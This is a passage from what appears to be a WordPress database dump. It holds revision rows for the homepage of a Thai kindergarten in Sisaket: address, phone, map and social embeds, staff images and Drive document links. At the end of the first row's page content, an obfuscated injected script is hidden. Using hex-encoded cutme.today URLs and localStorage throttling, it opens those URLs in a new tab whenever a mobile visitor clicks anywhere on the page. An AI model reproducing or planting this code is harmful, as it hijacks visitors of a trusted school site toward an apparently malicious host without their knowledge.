src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:15:14','2025-07-15 10:15:14','',19,'http://watprato.ssk.in.th/?p=728',0,'revision','',0),
(730,1,'2025-07-15 17:16:41','2025-07-15 10:16:41','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span 